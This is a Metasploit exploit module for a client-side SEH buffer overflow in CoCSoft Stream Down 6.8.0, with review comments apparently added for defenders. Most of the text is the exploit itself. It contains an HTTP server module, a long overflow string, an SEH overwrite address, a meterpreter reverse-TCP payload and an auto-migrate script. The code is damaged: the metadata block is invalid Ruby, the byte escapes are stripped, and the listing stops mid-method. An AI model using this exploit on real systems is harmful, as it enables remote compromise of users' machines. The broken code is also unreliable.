
# Title : CoCSoft Stream Down 6.8.0 Universal exploit metasploit
# Published : 2011-12-27
# Author :

# $Id: stream_down_BOF.rb 1 2011-12-18 $
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/

require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
	# Reliability rating the module author assigns to this exploit.
	Rank = GreatRanking
	# HttpServer mixin: the module runs as an HTTP server and reacts when a
	# client connects to it (see on_request_uri below). The vulnerable
	# application is therefore the client side of the connection; exposure
	# depends on it fetching content from a server the user does not control.
	# NOTE(review): the code that sends the response is not visible in this
	# listing, so the exact delivery path cannot be confirmed from here.
	include Msf::Exploit::Remote::HttpServer
	# Declares the module's metadata: name, version, description, author,
	# reference, default options, payload constraints, platform and targets.
	#
	# NOTE(review): as captured on this page the method is not valid Ruby. The
	# call that should receive these key/value pairs, the braces and brackets
	# around the nested values, and the closing `end` are all absent,
	# presumably dropped when the listing was extracted. Treat this as a
	# damaged copy of the module, not a loadable one.
	def initialize
					'Name'           => 'StreamDown Buffer over flow universal exploit',
					'Version'        => '$Revision: 1 $',
					# The author reports testing on Windows XP SP3 and Windows 7 SP1 and
					# states that the target program does not crash when a meterpreter
					# reverse TCP payload is used. For defenders this means a crash or
					# error report cannot be relied on as an indicator; network and
					# process telemetry are the signals to look at instead.
					'Description'    => 'Stream Down Buffer Overflow universal exploit tested against win xp sp3 and win7 sp1. Also note that the program will not crash in case of meterpreter reverse tcp payload but a session will be opened',
					'Author'         => 'Fady Mohamed Osman',
					# The only reference is the author's own site. No CVE or vendor
					# advisory identifier appears in this listing, so the flaw cannot be
					# mapped to a tracked vulnerability from this page alone.
					'References'	 => 
								['URL', 'http://www.dark-masters.tk/']
					# false: the module does not claim that the resulting session runs
					# with elevated privileges.
					'Privileged'     => false,
					'DefaultOptions' =>
							# Exit technique the payload uses by default (SEH-based).
							'EXITFUNC' => 'seh',
							# Script run automatically as soon as a session opens. In Metasploit
							# `migrate -f` moves the session into a newly started process, so the
							# session can outlive the exploited application. An unexpected child
							# process of the download client is the corresponding detection point.
							'InitialAutoRunScript' => 'migrate -f'
					'Payload'        =>
							# Byte values the encoded payload must avoid.
							# NOTE(review): as printed there are no backslashes, so this is
							# literal text, not a list of byte values; the escapes appear to
							# have been stripped by the same extraction damage.
							'BadChars' => "x00xffx0a"
					'Platform'       => 'win',
					'Targets'        =>
							# Single target with an empty options hash: no per-OS settings are
							# defined here, consistent with the "universal" claim in the name.
							[ 'Automatic',  { } ],
					'DefaultTarget' => 0,
					'License'        => MSF_LICENSE
	def on_request_uri(cli,request)
		seh = 0x10019448
		nseh = "xebx06x90x90"
		sploit = "A"*16388 + nseh + [seh].pack('V') + "x90"*10 + payload.encoded 